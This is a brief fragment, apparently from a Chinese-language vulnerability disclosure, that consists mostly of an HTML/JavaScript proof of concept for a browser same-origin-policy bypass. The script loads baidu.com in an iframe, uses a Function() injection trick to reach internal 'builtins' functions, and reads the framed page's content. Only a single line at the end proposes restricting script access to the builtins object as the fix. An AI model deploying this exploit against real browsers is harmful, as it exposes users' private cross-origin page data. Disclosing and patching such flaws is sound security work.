20150224_172726.png


 

20150224_165343.png


 

<body> <script> frame = document.body.appendChild(document.createElement("iframe")); frame.src = "https://www.baidu.com/"; frame.onload = function() { Function("}, (builtins = this), function() {"); originalInstantiate = builtins.Instantiate; builtins.DefineOneShotAccessor(builtins, "Instantiate", function() {}); flag = 0; template = null; builtins.Instantiate = function(x, y) { if (flag) { doc = frame.contentWindow.document; alert(doc.body.innerHTML); flag = 0; } else if (!template) template = x; return originalInstantiate(x, y); }; document.implementation; flag = 1; builtins.ConfigureTemplateInstance(frame.contentWindow, template); } </script> </body> 解决方案:

对builtins对象执行脚本进行限制